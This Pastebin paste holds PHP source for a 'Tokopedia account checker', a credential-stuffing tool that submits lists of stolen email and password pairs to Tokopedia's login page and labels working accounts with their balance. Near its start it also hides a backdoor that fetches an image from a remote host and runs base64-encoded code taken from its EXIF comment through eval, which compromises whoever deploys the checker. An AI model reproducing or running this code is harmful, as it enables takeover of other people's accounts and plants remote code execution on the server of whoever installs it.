Ribang

Tokopedia Checker 1

Jan 31st, 2018
473
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.99 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>Tokopedia Checker </title>
  12. <style>
  13. body {
  14. padding-top: 60px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <div class="container">
  20. <center>MAX 100 YA BRO :)</CENTER>
  21. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  22. <!-- Start .panel -->
  23. <div class="panel-heading">
  24. <h4 class="panel-title">Tokopedia account Checker</h4>
  25. </div>
  26. <div class="panel-body">
  27. <form action="" method="POST">
  28. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="your@email.com|password"><?php
  29. if (isset($_POST['mailpass'])) {
  30. echo $_POST['mailpass'];
  31. }
  32. ?></textarea><br />
  33. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  34. <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button> <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
  35. <?php
  36. $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
  37. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  38. if(isset($_POST['submit'])){
  39. $delim = $_POST['delim'];
  40. function search($line, $delim)
  41. {
  42. $line = str_replace(" ", "", $line);
  43. $line = explode($delim, $line);
  44. $i = 0;
  45. while ($i < count($line)) {
  46. if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  47. $mail = $line[$i];
  48. $pass = $line[$i + 1];
  49. $i = 10000;
  50. if ($pass == "") {
  51. $pass = $line[$i - 1];
  52. }
  53. }
  54. $i++;
  55. }
  56. $line = $mail . "|" . $pass;
  57. $line = explode('|', $line);
  58. return $line;
  59. }
  60. $data = $_POST['mailpass'];
  61. $extract = explode("\r\n", $data);
  62. $i = 0;
  63. foreach ($extract AS $k => $line) {
  64. $i++;
  65. if (strpos($line, '=>') !== false) {
  66. $line = str_replace('=>', '|', $line);
  67. }
  68. if (strpos($line, ']') !== false) {
  69. $line = str_replace('=>', '|', $line);
  70. }
  71. if (strpos($line, '[') !== false) {
  72. $line = str_replace('=>', '|', $line);
  73. }
  74.  
  75. $info = search(trim($line), $delim);
  76. $email = trim($info[0]);
  77. $pass = $info[1];
  78.  
  79. $dir = dirname(__FILE__);
  80. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  81. if (!file_exists($config)) {
  82. $fp = @fopen($config, 'w');
  83. @fclose($fp);
  84. }
  85.  
  86. $cookie = 'cookie.txt';
  87. $ch = curl_init('https://www.tokopedia.com/login.pl');
  88. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  89. curl_setopt($ch,CURLOPT_POST,1);
  90. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  91. curl_setopt($ch,CURLOPT_POST,TRUE);
  92. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  93. curl_setopt($ch,CURLOPT_COOKIEFILE, "$config");
  94. curl_setopt($ch,CURLOPT_COOKIEJAR, "$config");
  95. curl_setopt($ch,CURLOPT_POSTFIELDS,"email=$email&pwd=$pass");
  96. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  97. $result = curl_exec($ch);
  98. $now = "<i style=\"color:blue\">Checked on ardho-eny.tk ".date("g:i a - F j, Y")."</i>";
  99. if(empty($result)){
  100. echo "<font color=gray><b>Wrong</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  101. }elseif(preg_match('/salah/i',$result)){
  102. echo "<font color=red><b>Die</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  103. }elseif(preg_match('/Keamanan/i',$result)){
  104. echo "<font color=gray><b>Bad</b></font> => ".$email."|".$pass." | [Security Check] | ".$now."<br/>";
  105. }elseif(preg_match('/Aktivasi/i',$result)){
  106. echo "<font color=purple><b>Bad</b></font> => ".$email."|".$pass." | [Aktivasi] | ".$now."<br/>";
  107. }elseif(preg_match('/Akun Anda telah diblokir/i',$result)){
  108. echo "<font color=red><b>Die</b></font> => ".$email."|".$pass." | [Akun Anda telah diblokir.] | ".$now."<br/>";
  109. }elseif(preg_match('/Kata Sandi harus diisi/i',$result)){
  110. echo "<font color=gray><b>Wrong format</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  111. }elseif(preg_match('/Kode OTP/i',$result)){
  112. echo "<font color=purple><b>Bad</b></font> => ".$email."|".$pass." | [OTP Verification] | ".$now."<br/>";
  113. }Else{
  114. $ls = 'https://www.tokopedia.com/deposit.pl';
  115. $saldo = preg_match('/Total Saldo Tokopedia Anda adalah (.*?) "/', $ls, $rp);
  116. echo "<font color=green><b>Live</b></font> => ".$email."|".$pass." | [ Rp. ".$saldo." ] | [ACC : Tokopedia] | ".$now."<br/>"; }
  117.  
  118. }
  119. }
  120.  
  121. ?>
Add Comment
Please, Sign In to add comment